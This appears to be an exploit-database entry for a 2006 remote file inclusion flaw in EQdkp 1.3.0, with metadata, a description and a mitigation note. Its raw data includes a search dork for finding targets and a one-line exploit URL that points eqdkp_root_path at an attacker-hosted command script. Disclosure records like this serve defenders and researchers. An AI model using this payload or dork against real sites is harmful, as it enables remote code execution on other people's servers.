header-logo
Suggest Exploit
vendor:
EQdkp
by:
OLiBekaS
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: EQdkp
Affected Version From: 1.3.0
Affected Version To: 1.3.0
Patch Exists: YES
Related CWE: N/A
CPE: a:eqdkp:eqdkp
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

EQdkp <= 1.3.0 Remote File Inclusion

A remote file inclusion vulnerability exists in EQdkp <= 1.3.0. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL in the eqdkp_root_path parameter of the /includes/dbal.php script. This can allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a file inclusion context.
Source

Exploit-DB raw data:

Title: EQdkp <= 1.3.0 Remote File Inclusion
URL: http://www.eqdkp.com/
Dork: "powered by EQdkp"
Author: OLiBekaS
greetz: Skulmatic, weleh, brockencode, and all #papmahackerlink crew

Exploit: /includes/dbal.php?eqdkp_root_path=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-05-07]

Navigation

Suggest Exploit

Services By CQR